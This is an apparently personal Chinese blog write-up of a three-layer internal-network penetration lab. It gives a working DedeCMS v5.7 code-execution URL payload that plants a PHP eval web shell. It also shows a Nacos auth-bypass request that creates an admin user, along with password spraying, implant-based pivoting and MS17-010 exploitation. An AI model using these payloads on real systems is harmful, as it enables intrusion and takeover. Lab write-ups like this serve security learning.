三层综合渗透

三层综合渗透

信息收集

探测开放端口信息

nmap扫描

┌──(root㉿kali)-[~]
└─# nmap -sT --min-rate 5000 192.168.111.20       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-02 14:48 CST
Nmap scan report for 192.168.111.20
Host is up (0.00082s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
25/tcp  open  smtp
110/tcp open  pop3
143/tcp open  imap

Nmap done: 1 IP address (1 host up) scanned in 2.62 seconds

无影扫一下

image-20251202145721881

8080端口信息

image-20251202145837709

织梦cms

第一台漏洞利用

管理员弱口令

找到管理员登录接口,版本是v5.7

image-20251202151255571

admin/admin登录成功

image-20251202151313334

DedecmsV5.7任意代码执行

登录成功后利用payload:

/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}system(whoami);{/dede:field}

成功执行命令

image-20251202151518613

windows的系统

写个一句话

http://192.168.111.20:8080/dede/tag_test_action.php?url=a&token=&partcode={dede:field%20name='source'%20runphp='yes'}file_put_contents('1.php','<?php @eval($_POST[cmd]);?>');{/dede:field}

蚁剑连接

内网探测

网段

image-20251202152816765

192.168.52.0/24网段探测

上传fscan进行扫描

扫描结果:

[+] 端口开放 192.168.52.4:80
[+] 端口开放 192.168.52.4:22
[+] 端口开放 192.168.52.2:21
[+] 端口开放 192.168.52.2:445
[+] 端口开放 192.168.52.2:139
[+] 端口开放 192.168.52.2:135
[+] 端口开放 192.168.52.4:6379
[+] 端口开放 192.168.52.2:3306
[+] 端口开放 192.168.52.2:8080
[+] 端口开放 192.168.52.4:8848
[*] 网站标题 http://192.168.52.4       状态码:200 长度:0      标题:无标题
[*] 网站标题 http://192.168.52.4:8848  状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[*] 网站标题 http://192.168.52.2:8080  状态码:200 长度:14405  标题:我的网站
[+] 发现指纹 目标: http://192.168.52.2:8080  指纹: [CMS]
[+] [发现漏洞] 目标: http://192.168.52.4:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://192.168.52.2:8080
  漏洞类型: poc-yaml-dedecms-cve-2018-6910
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://192.168.52.4:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] 端口开放 192.168.52.2:21
[+] 端口开放 192.168.52.4:80
[+] 端口开放 192.168.52.4:22
[+] 端口开放 192.168.52.2:139
[+] 端口开放 192.168.52.2:3306
[+] 端口开放 192.168.52.2:135
[+] 端口开放 192.168.52.4:8848
[+] 端口开放 192.168.52.4:6379
[+] 端口开放 192.168.52.2:445
[+] 端口开放 192.168.52.2:8080
[*] 网站标题 http://192.168.52.4       状态码:200 长度:0      标题:无标题
[*] 网站标题 http://192.168.52.4:8848  状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[*] 网站标题 http://192.168.52.2:8080  状态码:200 长度:14405  标题:我的网站
[+] 发现指纹 目标: http://192.168.52.2:8080  指纹: [CMS]
[+] [发现漏洞] 目标: http://192.168.52.4:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://192.168.52.4:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://192.168.52.2:8080
  漏洞类型: poc-yaml-dedecms-cve-2018-6910
  漏洞名称: 
  详细信息: %!s(<nil>)

为后续上线其他内网机子先上线vshell

先生成一个马子

image-20251202153818391

上传运行上线

image-20251202154525130

隧道代理

image-20251202154623791

proxifier配置

image-20251202154757124

测试成功

image-20251202154837299

第二台漏洞利用

nacos

查看到用户列表

http://192.168.52.4:8848/nacos/v1/auth/users?pageNo=1&pageSize=100

image-20251202155100437

创建用户

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.52.4:8848
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=yk1ng&password=yk1ng

image-20251202155314664

成功登录

image-20251202155342490

查看password的配置

image-20251202155754478

看到前面扫出来的端口有6379(redis)和22(ssh)

进行密码喷洒

登录成功

image-20251202160130551

getshell

使用工具一把梭

image-20251202161346839

连接

image-20251202161842758

上传正向马上线

image-20251202162705181

第三台上fscan扫到ms1701

使用方程式工具包一把锁

image-20251203181526850

posted @ 2025-12-03 18:35  yk1ng  阅读(7)  评论(0)    收藏  举报